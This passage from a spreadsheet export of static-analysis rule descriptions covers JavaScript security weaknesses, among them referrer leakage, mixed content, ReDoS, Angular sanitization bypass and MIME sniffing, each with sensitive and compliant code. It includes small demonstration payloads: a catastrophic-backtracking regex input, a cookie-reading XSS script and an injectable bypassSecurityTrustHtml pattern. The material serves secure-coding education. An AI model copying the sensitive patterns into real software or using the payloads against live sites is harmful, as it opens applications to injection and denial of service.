})); // Compliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; -
  Sensitive Data Exposure &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security"&gt;developer.mozilla.org&lt;/a&gt; - Strict Transport
  Security &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5736</t>
  </si>
  <si>
    <t>Disabling strict HTTP no-referrer policy is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="https://en.wikipedia.org/wiki/HTTP_referer"&gt;HTTP header referer&lt;/a&gt; contains a URL set by web browsers and used by applications to track
from where the user came from, itâ€™s for instance a relevant value for web analytic services, but it can cause &lt;a
href="https://developer.mozilla.org/en-US/docs/Web/Security/Referer_header:_privacy_and_security_concerns"&gt;serious privacy and security problems&lt;/a&gt;
if the URL contains confidential information. Note that Firefox for instance, to prevent data leaks, &lt;a
href="https://blog.mozilla.org/security/2018/01/31/preventing-data-leaks-by-stripping-path-information-in-http-referrers/"&gt;removes path
information&lt;/a&gt; in the Referer header while browsing privately.&lt;/p&gt;
&lt;p&gt;Suppose an e-commerce website asks the user his credit card number to purchase a product:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;html&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;form action="/valid_order" method="GET"&amp;gt;
Type your credit card number to purchase products:
&amp;lt;input type=text id="cc" value="1111-2222-3333-4444"&amp;gt;
&amp;lt;input type=submit&amp;gt;
&amp;lt;/form&amp;gt;
&amp;lt;/body&amp;gt;
&lt;/pre&gt;
&lt;p&gt;When submitting the above HTML form, a HTTP GET request will be performed, the URL requested will be
https://example.com/valid_order?cc=1111-2222-3333-4444 with credit card number inside and itâ€™s obviously not secure for these reasons:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; URLs are stored in the history of browsers. &lt;/li&gt;
  &lt;li&gt; URLs could be accidentally shared when doing copy/paste actions. &lt;/li&gt;
  &lt;li&gt; URLs can be stolen if a malicious person looks at the computer screen of an user. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In addition to these threats, when further requests will be performed from the "valid_order" page with a simple legitimate embedded script like
that:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;script src="https://webanalyticservices_example.com/track"&amp;gt;
&lt;/pre&gt;
&lt;p&gt;The referer header which contains confidential information will be send to a third party web analytic service and cause privacy issue:&lt;/p&gt;
&lt;pre&gt;
GET /track HTTP/2.0
Host: webanalyticservices_example.com
Referer: https://example.com/valid_order?cc=1111-2222-3333-4444
&lt;/pre&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Confidential information exists in URLs. &lt;/li&gt;
  &lt;li&gt; Semantic of HTTP methods is not respected (eg: use of a GET method instead of POST when the state of the application is changed). &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Confidential information should not be set inside URLs (GET requests) of the application and a safe (ie: different from &lt;code&gt;unsafe-url&lt;/code&gt; or
&lt;code&gt;no-referrer-when-downgrade&lt;/code&gt;) &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy"&gt;referrer-Policy&lt;/a&gt;
header, to control how much information is included in the referer header, should be used.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;In Express.js application the code is sensitive if the &lt;a href="https://www.npmjs.com/package/helmet"&gt;helmet&lt;/a&gt; &lt;code&gt;referrerPolicy&lt;/code&gt;
middleware is disabled or used with &lt;code&gt;no-referrer-when-downgrade&lt;/code&gt; or &lt;code&gt;unsafe-url&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
app.use(
  helmet.referrerPolicy({
    policy: 'no-referrer-when-downgrade' // Sensitive: no-referrer-when-downgrade is used
  })
);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;In Express.js application a secure solution is to user the &lt;a href="https://www.npmjs.com/package/helmet"&gt;helmet&lt;/a&gt; referrer policy middleware set
to &lt;code&gt;no-referrer&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
let app = express();
app.use(
  helmet.referrerPolicy({
    policy: 'no-referrer' // Compliant
  })
);
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; -
  Sensitive Data Exposure &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy"&gt;developer.mozilla.org&lt;/a&gt; - Referrer-Policy &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/Security/Referer_header:_privacy_and_security_concerns"&gt;developer.mozilla.org&lt;/a&gt; -
  Referer header: privacy and security concerns &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/200.html"&gt;MITRE, CWE-200&lt;/a&gt; - Exposure of Sensitive Information to an Unauthorized Actor &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5730</t>
  </si>
  <si>
    <t>Allowing mixed-content is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;A mixed-content is when a resource is loaded with the HTTP protocol, from a website accessed with the HTTPs protocol, thus mixed-content are not
encrypted and exposed to &lt;a href="https://en.wikipedia.org/wiki/Man-in-the-middle_attack"&gt;MITM attacks&lt;/a&gt; and could break the entire level of
protection that was desired by implementing encryption with the HTTPs protocol.&lt;/p&gt;
&lt;p&gt;The main threat with mixed-content is not only the confidentiality of resources but the whole website integrity:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; A passive mixed-content (eg: &lt;em&gt;&amp;lt;img src="http://example.com/picture.png"&amp;gt;&lt;/em&gt;) allows an attacker to access and replace only these
  resources, like images, with malicious ones that could lead to successful phishing attacks. &lt;/li&gt;
  &lt;li&gt; With active mixed-content (eg: &lt;em&gt;&amp;lt;script src="http://example.com/library.js"&amp;gt;&lt;/em&gt;) an attacker can compromise the entire website by
  injecting malicious javascript code for example (accessing and modifying the DOM, steal cookies, etc). &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; The HTTPS protocol is in place and external resources are fetched from the website pages. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to this question.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Implement content security policy &lt;em&gt;block-all-mixed-content&lt;/em&gt; directive which is supported by all modern browsers and will block loading of
mixed-contents.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;In Express.js application the code is sensitive if the &lt;a href="https://www.npmjs.com/package/helmet-csp"&gt;helmet-csp&lt;/a&gt; or &lt;a
href="https://www.npmjs.com/package/helmet"&gt;helmet&lt;/a&gt; middleware is used without the &lt;code&gt;blockAllMixedContent&lt;/code&gt; directive:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
let app = express();
app.use(
  helmet.contentSecurityPolicy({
    directives: {
      "default-src": ["'self'", 'example.com', 'code.jquery.com']
    } // Sensitive: blockAllMixedContent directive is missing
  })
);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;In Express.js application a standard way to block mixed-content is to put in place the &lt;a
href="https://www.npmjs.com/package/helmet-csp"&gt;helmet-csp&lt;/a&gt; or &lt;a href="https://www.npmjs.com/package/helmet"&gt;helmet&lt;/a&gt; middleware with the
&lt;code&gt;blockAllMixedContent&lt;/code&gt; directive:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
let app = express();
app.use(
  helmet.contentSecurityPolicy({
    directives: {
      "default-src": ["'self'", 'example.com', 'code.jquery.com'],
      blockAllMixedContent: [] // Compliant
    }
  })
);
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; -
  Sensitive Data Exposure &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/Security/Mixed_content"&gt;developer.mozilla.org&lt;/a&gt; - Mixed-content &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP"&gt;developer.mozilla.org&lt;/a&gt; - Content Security Policy (CSP) &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.w3.org/TR/CSP3/"&gt;w3.org&lt;/a&gt; - Content Security Policy Level 3 &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5852</t>
  </si>
  <si>
    <t>Using slow regular expressions is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Most of the regular expression engines use backtracking to try all possible execution paths of the regular expression when evaluating an input, in
some cases it can cause performance issues, called &lt;strong&gt;catastrophic backtracking&lt;/strong&gt; situations. In the worst case, the complexity of the
regular expression is exponential in the size of the input, this means that a small carefully-crafted input (like 20 chars) can trigger catastrophic
backtracking and cause a denial of service of the application. Super-linear regex complexity can lead to the same impact too with, in this case, a
large carefully-crafted input (thousands chars).&lt;/p&gt;
&lt;p&gt;This rule determines the runtime complexity of a regular expression and informs you if it is not linear.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; The input is user-controlled. &lt;/li&gt;
  &lt;li&gt; The input size is not restricted to a small number of characters. &lt;/li&gt;
  &lt;li&gt; There is no timeout in place to limit the regex evaluation time. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;To avoid catastrophic backtracking situations, make sure that none of the following conditions apply to your regular expression.&lt;/p&gt;
&lt;p&gt;In all of the following cases, catastrophic backtracking can only happen if the problematic part of the regex is followed by a pattern that can
fail, causing the backtracking to actually happen.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; If you have a repetition &lt;code&gt;r*&lt;/code&gt; or &lt;code&gt;r*?&lt;/code&gt;, such that the regex &lt;code&gt;r&lt;/code&gt; could produce different possible matches (of
  possibly different lengths) on the same input, the worst case matching time can be exponential. This can be the case if &lt;code&gt;r&lt;/code&gt; contains
  optional parts, alternations or additional repetitions (but not if the repetition is written in such a way that thereâ€™s only one way to match it).
  &lt;/li&gt;
  &lt;li&gt; If you have multiple repetitions that can match the same contents and are consecutive or are only separated by an optional separator or a
  separator that can be matched by both of the repetitions, the worst case matching time can be polynomial (O(n^c) where c is the number of
  problematic repetitions). For example &lt;code&gt;a*b*&lt;/code&gt; is not a problem because &lt;code&gt;a*&lt;/code&gt; and &lt;code&gt;b*&lt;/code&gt; match different things and
  &lt;code&gt;a*_a*&lt;/code&gt; is not a problem because the repetitions are separated by a &lt;code&gt;'_'&lt;/code&gt; and canâ€™t match that &lt;code&gt;'_'&lt;/code&gt;. However,
  &lt;code&gt;a*a*&lt;/code&gt; and &lt;code&gt;.*_.*&lt;/code&gt; have quadratic runtime. &lt;/li&gt;
  &lt;li&gt; If the regex is not anchored to the beginning of the string, quadratic runtime is especially hard to avoid because whenever a match fails, the
  regex engine will try again starting at the next index. This means that any unbounded repetition, if itâ€™s followed by a pattern that can fail, can
  cause quadratic runtime on some inputs. For example &lt;code&gt;str.split(/\s*,/)&lt;/code&gt; will run in quadratic time on strings that consist entirely of
  spaces (or at least contain large sequences of spaces, not followed by a comma). &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In order to rewrite your regular expression without these patterns, consider the following strategies:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; If applicable, define a maximum number of expected repetitions using the bounded quantifiers, like &lt;code&gt;{1,5}&lt;/code&gt; instead of &lt;code&gt;+&lt;/code&gt;
  for instance. &lt;/li&gt;
  &lt;li&gt; Refactor nested quantifiers to limit the number of way the inner group can be matched by the outer quantifier, for instance this nested
  quantifier situation &lt;code&gt;(ba+)+&lt;/code&gt; doesnâ€™t cause performance issues, indeed, the inner group can be matched only if there exists exactly one
  &lt;code&gt;b&lt;/code&gt; char per repetition of the group. &lt;/li&gt;
  &lt;li&gt; Optimize regular expressions by emulating &lt;em&gt;possessive quantifiers&lt;/em&gt; and &lt;em&gt;atomic grouping&lt;/em&gt;. &lt;/li&gt;
  &lt;li&gt; Use negated character classes instead of &lt;code&gt;.&lt;/code&gt; to exclude separators where applicable. For example the quadratic regex
  &lt;code&gt;.*_.*&lt;/code&gt; can be made linear by changing it to &lt;code&gt;[^_]*_.*&lt;/code&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Sometimes itâ€™s not possible to rewrite the regex to be linear while still matching what you want it to match. Especially when the regex is not
anchored to the beginning of the string, for which it is quite hard to avoid quadratic runtimes. In those cases consider the following approaches:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; Solve the problem without regular expressions &lt;/li&gt;
  &lt;li&gt; Use an alternative non-backtracking regex implementations such as Googleâ€™s &lt;a href="https://github.com/google/re2"&gt;RE2&lt;/a&gt; or &lt;a
  href="https://github.com/uhop/node-re2/"&gt;node-re2&lt;/a&gt;. &lt;/li&gt;
  &lt;li&gt; Use multiple passes. This could mean pre- and/or post-processing the string manually before/after applying the regular expression to it or
  using multiple regular expressions. One example of this would be to replace &lt;code&gt;str.split(/\s*,\s*/)&lt;/code&gt; with &lt;code&gt;str.split(",")&lt;/code&gt; and
  then trimming the spaces from the strings as a second step. &lt;/li&gt;
  &lt;li&gt; It is often possible to make the regex infallible by making all the parts that could fail optional, which will prevent backtracking. Of course
  this means that youâ€™ll accept more strings than intended, but this can be handled by using capturing groups to check whether the optional parts were
  matched or not and then ignoring the match if they werenâ€™t. For example the regex &lt;code&gt;x*y&lt;/code&gt; could be replaced with &lt;code&gt;x*(y)?&lt;/code&gt; and
  then the call to &lt;code&gt;str.match(regex)&lt;/code&gt; could be replaced with &lt;code&gt;matched = str.match(regex)&lt;/code&gt; and &lt;code&gt;matched[1] !==
  undefined&lt;/code&gt;. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;The regex evaluation will never end:&lt;/p&gt;
&lt;pre&gt;
/(a+)+$/.test(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaa!"
); // Sensitive
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;Possessive quantifiers do not keep backtracking positions, thus can be used, if possible, to avoid performance issues. Unfortunately, they are not
supported in JavaScript, but one can still mimick them using lookahead assertions and backreferences:&lt;/p&gt;
&lt;pre&gt;
/((?=(a+))\2)+$/.test(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaa!"
); // Compliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A1-Injection"&gt;OWASP Top 10 2017 Category A1&lt;/a&gt; - Injection &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/400.html"&gt;MITRE, CWE-400&lt;/a&gt; - Uncontrolled Resource Consumption &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/1333.html"&gt;MITRE, CWE-1333&lt;/a&gt; - Inefficient Regular Expression Complexity &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS"&gt;owasp.org&lt;/a&gt; - OWASP Regular expression Denial
  of Service - ReDoS &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://stackstatus.net/post/147710624694/outage-postmortem-july-20-2016"&gt;stackstatus.net&lt;/a&gt; - Outage Postmortem - July 20, 2016
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.regular-expressions.info/catastrophic.html"&gt;regular-expressions.info&lt;/a&gt; - Runaway Regular Expressions: Catastrophic
  Backtracking &lt;/li&gt;
  &lt;li&gt; &lt;a
  href="https://docs.microsoft.com/en-us/dotnet/standard/base-types/backtracking-in-regular-expressions#backtracking-with-nested-optional-quantifiers"&gt;docs.microsoft.com&lt;/a&gt; - Backtracking with Nested Optional Quantifiers &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5850</t>
  </si>
  <si>
    <t>Alternatives in regular expressions should be grouped when used with anchors</t>
  </si>
  <si>
    <t>&lt;p&gt;In regular expressions, anchors &lt;code&gt;^&lt;/code&gt; and &lt;code&gt;$&lt;/code&gt; have higher precedence than the &lt;code&gt;|&lt;/code&gt; operator. So in a regular
expression like &lt;code&gt;^alt1|alt2|alt3$&lt;/code&gt;, &lt;code&gt;alt1&lt;/code&gt; would be anchored to the beginning, &lt;code&gt;alt3&lt;/code&gt; to the end and
&lt;code&gt;alt2&lt;/code&gt; wouldnâ€™t be anchored at all. Usually the intended behavior is that all alternatives are anchored at both ends. To achieve this, a
non-capturing group should be used around the alternatives.&lt;/p&gt;
&lt;p&gt;In cases where it is intended that the anchors only apply to one alternative each, adding (non-capturing) groups around the anchors and the parts
that they apply to will make it explicit which parts are anchored and avoid readers misunderstanding the precedence or changing it because they
mistakenly assume the precedence was not intended.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
^a|b|c$
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
^(?:a|b|c)$
&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;
^a$|^b$|^c$
&lt;/pre&gt;
&lt;p&gt;or, if you do want the anchors to only apply to &lt;code&gt;a&lt;/code&gt; and &lt;code&gt;c&lt;/code&gt; respectively:&lt;/p&gt;
&lt;pre&gt;
(?:^a)|b|(?:c$)
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S6268</t>
  </si>
  <si>
    <t>Disabling Angular built-in sanitization is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Angular prevents XSS vulnerabilities by treating all values as untrusted by default. Untrusted values are systematically sanitized by the framework
before they are inserted into the DOM.&lt;/p&gt;
&lt;p&gt;Still, developers have the ability to manually mark a value as trusted if they are sure that the value is already sanitized. Accidentally trusting
malicious data will introduce an XSS vulnerability in the application and enable a wide range of serious attacks like accessing/modifying sensitive
information or impersonating other users.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; The value for which sanitization has been disabled is user controlled. &lt;/li&gt;
  &lt;li&gt; Itâ€™s difficult to understand how this value is constructed. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Avoid including dynamic executable code and thus disabling Angularâ€™s built-in sanitization unless itâ€™s absolutely necessary. Try instead to
  rely as much as possible on static templates and Angular built-in sanitization to define web page content. &lt;/li&gt;
  &lt;li&gt; Make sure to understand how the value to consider as trusted is constructed and never concatenate it with user controlled data. &lt;/li&gt;
  &lt;li&gt; Make sure to choose the correct &lt;a href="https://angular.io/api/platform-browser/DomSanitizer"&gt;DomSanitizer&lt;/a&gt; "bypass" method based on the
  context. For instance, only use &lt;code&gt;bypassSecurityTrustUrl&lt;/code&gt; to trust urls in an &lt;code&gt;href&lt;/code&gt; attribute context. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
import { Component, OnInit } from '@angular/core';
import { DomSanitizer, SafeHtml } from "@angular/platform-browser";
import { ActivatedRoute } from '@angular/router';
@Component({
  template: '&amp;lt;div id="hello" [innerHTML]="hello"&amp;gt;&amp;lt;/div&amp;gt;'
})
export class HelloComponent implements OnInit {
  hello: SafeHtml;
  constructor(private sanitizer: DomSanitizer, private route: ActivatedRoute) { }
  ngOnInit(): void {
    let name = this.route.snapshot.queryParams.name;
    let html = "&amp;lt;h1&amp;gt;Hello " + name + "&amp;lt;/h1&amp;gt;";
    this.hello = this.sanitizer.bypassSecurityTrustHtml(html); // Sensitive
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
import { Component, OnInit } from '@angular/core';
import { DomSanitizer } from "@angular/platform-browser";
import { ActivatedRoute } from '@angular/router';
@Component({
  template: '&amp;lt;div id="hello"&amp;gt;&amp;lt;h1&amp;gt;Hello {{name}}&amp;lt;/h1&amp;gt;&amp;lt;/div&amp;gt;',
})
export class HelloComponent implements OnInit {
  name: string;
  constructor(private sanitizer: DomSanitizer, private route: ActivatedRoute) { }
  ngOnInit(): void {
    this.name = this.route.snapshot.queryParams.name;
  }
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS)"&gt;OWASP Top 10 2017 Category A7&lt;/a&gt; - Cross-Site
  Scripting (XSS) &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/79.html"&gt;MITRE, CWE-79&lt;/a&gt; - Improper Neutralization of Input During Web Page Generation
  ('Cross-site Scripting') &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/80.html"&gt;MITRE, CWE-80&lt;/a&gt; - Improper Neutralization of Script-Related HTML Tags in a Web Page
  (Basic XSS) &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/83.html"&gt;MITRE, CWE-83&lt;/a&gt; - Improper Neutralization of Script in Attributes in a Web Page
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/84.html"&gt;MITRE, CWE-84&lt;/a&gt; - Improper Neutralization of Encoded URI Schemes in a Web Page &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://angular.io/guide/security"&gt;Angular - Best Practices - Security&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1134</t>
  </si>
  <si>
    <t>Track uses of "FIXME" tags</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;FIXME&lt;/code&gt; tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.&lt;/p&gt;
&lt;p&gt;Sometimes the developer will not have the time or will simply forget to get back to that tag.&lt;/p&gt;
&lt;p&gt;This rule is meant to track those tags and to ensure that they do not go unnoticed.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function divide(numerator, denominator) {
  return numerator / denominator;              // FIXME denominator value might be  0
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/546.html"&gt;MITRE, CWE-546&lt;/a&gt; - Suspicious Comment &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5734</t>
  </si>
  <si>
    <t>Allowing browsers to sniff MIME types is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="https://blog.mozilla.org/security/2016/08/26/mitigating-mime-confusion-attacks-in-firefox/"&gt;MIME confusion&lt;/a&gt; attacks occur when an
attacker successfully tricks a web-browser to interpret a resource as a different type than the one expected. To correctly interpret a resource
(script, image, stylesheet â€¦â€‹) web browsers look for the &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Type"&gt;Content-Type
header&lt;/a&gt; defined in the HTTP response received from the server, but often this header is not set or is set with an incorrect value. To avoid
content-type mismatch and to provide the best user experience, web browsers try to deduce the right content-type, generally by inspecting the content
of the resources (the first bytes). This "guess mechanism" is called &lt;a href="https://en.wikipedia.org/wiki/Content_sniffing"&gt;MIME type
sniffing&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Attackers can take advantage of this feature when a website ("example.com" here) allows to upload arbitrary files. In that case, an attacker can
upload a malicious image &lt;em&gt;fakeimage.png&lt;/em&gt; (containing malicious JavaScript code or &lt;a
href="https://docs.microsoft.com/fr-fr/archive/blogs/ieinternals/script-polyglots"&gt;a polyglot content&lt;/a&gt; file) such as:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;
&lt;/pre&gt;
&lt;p&gt;When the victim will visit the website showing the uploaded image, the malicious script embedded into the image will be executed by web browsers
performing MIME type sniffing.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Type"&gt;Content-Type&lt;/a&gt; header is not systematically set for all
  resources. &lt;/li&gt;
  &lt;li&gt; Content of resources can be controlled by users. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Implement &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options"&gt;X-Content-Type-Options&lt;/a&gt; header with
&lt;em&gt;nosniff&lt;/em&gt; value (the only existing value for this header) which is supported by all modern browsers and will prevent browsers from performing
MIME type sniffing, so that in case of Content-Type header mismatch, the resource is not interpreted. For example within a &amp;lt;script&amp;gt; object
context, JavaScript MIME types are expected (like &lt;em&gt;application/javascript&lt;/em&gt;) in the Content-Type header.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;In Express.js application the code is sensitive if, when using &lt;a href="https://www.npmjs.com/package/helmet"&gt;helmet&lt;/a&gt;, the &lt;code&gt;noSniff&lt;/code&gt;
middleware is disabled:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
let app = express();
app.use(
  helmet({
    noSniff: false, // Sensitive
  })
);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;When using &lt;code&gt;helmet&lt;/code&gt; in an Express.js application, the &lt;code&gt;noSniff&lt;/code&gt; middleware should be enabled (it is also done by
default):&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet= require('helmet');
let app = express();
app.use(helmet.noSniff());
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A6-Security_Misconfiguration"&gt;OWASP Top 10 2017 Category A6&lt;/a&gt; -
  Security Misconfiguration &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options"&gt;developer.mozilla.org&lt;/a&gt; - X-Content-Type-Options
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://blog.mozilla.org/security/2016/08/26/mitigating-mime-confusion-attacks-in-firefox/"&gt;blog.mozilla.org&lt;/a&gt; - Mitigating MIME
  Confusion Attacks in Firefox &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5856</t>
  </si>
  <si>
    <t>Regular expressions should be syntactically valid</t>
  </si>
  <si>
    <t>&lt;p&gt;Regular expressions have their own syntax that is understood by regular expression engines. Those engines will throw an exception at runtime if
they are given a regular expression that does not conform to that syntax.&lt;/p&gt;
&lt;p&gt;To avoid syntax errors, special characters should be escaped with backslashes when they are intended to be matched literally and references to
capturing groups should use the correctly spelled name or number of the group.&lt;/p&gt;
&lt;p&gt;To match a literal string, rather than a regular expression, either all special characters should be escaped or methods that donâ€™t use regular
expressions should be used.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
new RegExp("([");
str.match("([");
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
new RegExp("\\(\\[");
str.match("\\(\\[");
